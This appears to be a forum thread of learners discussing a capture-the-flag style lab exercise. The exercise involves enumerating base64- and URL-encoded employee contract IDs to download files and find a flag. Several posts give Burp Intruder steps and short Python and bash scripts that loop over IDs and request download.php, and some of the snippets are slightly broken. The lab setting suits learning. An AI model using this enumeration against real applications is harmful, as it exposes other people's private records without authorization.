Try to download the contracts of the first 20 employee, one of which should contain the flag, which you can read with ‘cat’. You can either calculate the ‘contract’ parameter value, or calculate the ‘.pdf’ file name directly.
I tried using Burp’s Decoder to try 1 to 20 numbers but I was unsuccessful. Reading the source code we can see that the value is first getting base64 encoded and then URL encoded. I was not able to create a curl command to generate the right encoded values for the numbers 1 to 20.
I found that Burp is the easiest way to get the flag. You just need to understand that MQ%3D%3D is encoded for MQ==. This is also encoding for the number 1. It’s an encoding that we should be pretty familiar with by now. It took me longer to figure out than it should have.
Use this simple script to convert 20 numbers to 20 base64 encoded numbers:
import base64
for number in range(1,21):
base64_bytes = base64.b64encode(n)
base64_data = base64_bytes.decode('ascii')
Then, go to Burp make a request for any contract on the page, intercept the traffic, send that traffic to Intruder, select a Sniper Attack, as a payload use simple list, paste base64 encoded values, and you will see that one response length is different than the others, that is flag. Feel free to PM me if you need help.
I was troubled by the way in which to initiate an enumeration of user identifiers for a given range in regards to the many features of BurpSuite™ until I was tutored on the appropriate use of the Payload Options™ [Numbers]™ type of payload and the necessary configurations. In other references to BurpSuite™ enumeration, the caution was in favor of the Simple List™ option.
Anyone else ignorant of which the Bash script to use or create for enumerating identifiers could find Number(s)™ to be useful by way of enabling and setting the Payload Processing™ feature to ‘Base64-encode’.
‘Add’ the ‘processing rule’ for the btoa() JavaScript encoder function by selecting the appropriate ‘rule type’. Next, start the ‘Sniper’ attack before observing the HTTP Response for the uid that matched with the HTB value during the process.
for anyone who wants to use bash script to solve this exercise, this is my script and it worked well.
for i in {1..20}; do
for encodedid in $(echo -n $i | base64); do
curl "$url$encodedid"
Thank you @tabbii.
I’m not sure why I wasnt able to perforn the curl request on that exercise, even with the switch -O.
Ultimately I had to perform a dictionary attack through Burp Intruder.
for i in {1..20}; do echo -n $i | base64; done
Just paste the output into Burp Intruder and pay close attention to the length of the response.
Hello, everyone. I want to give two tips that would have helped me a lot to solve the challenge; one needs to adapt the curl command a bit to make the script run. Here are the two tips;
Investigate the HTTP method used in the request in the lesson and in the challenge. Does it influence the flags we use?
here is my script that fully automates and facilitates the entire process efficiently
for uid in {1..20}; do
hash=$(echo -n $uid | base64 -w 0 | tr -d ' -');
encoded_hash=$(jq -rn --arg v "$hash" '$v|@uri');
check=$(curl -s -X POST "$url/download.php?contract=$encoded_hash")
if [ "x$check" = "x" ]; then
echo "UID $uid empty"
echo "flag found in UID $uid! saving to flag.txt..."
echo "$check" > flag.txt
loops between UID’s 1 and 20, encoding the numbers to base 64, and then URL encoding them. after that, for each UID, we assign the content of the page (by curling a POST request) to a variable called ‘check’, which we then check whether it has any content written to it. if so, then the script will save the content of that page under a ‘flag.txt’ file, if not, the loop will go on until a page with content is found, in this scenario, the content is the flag.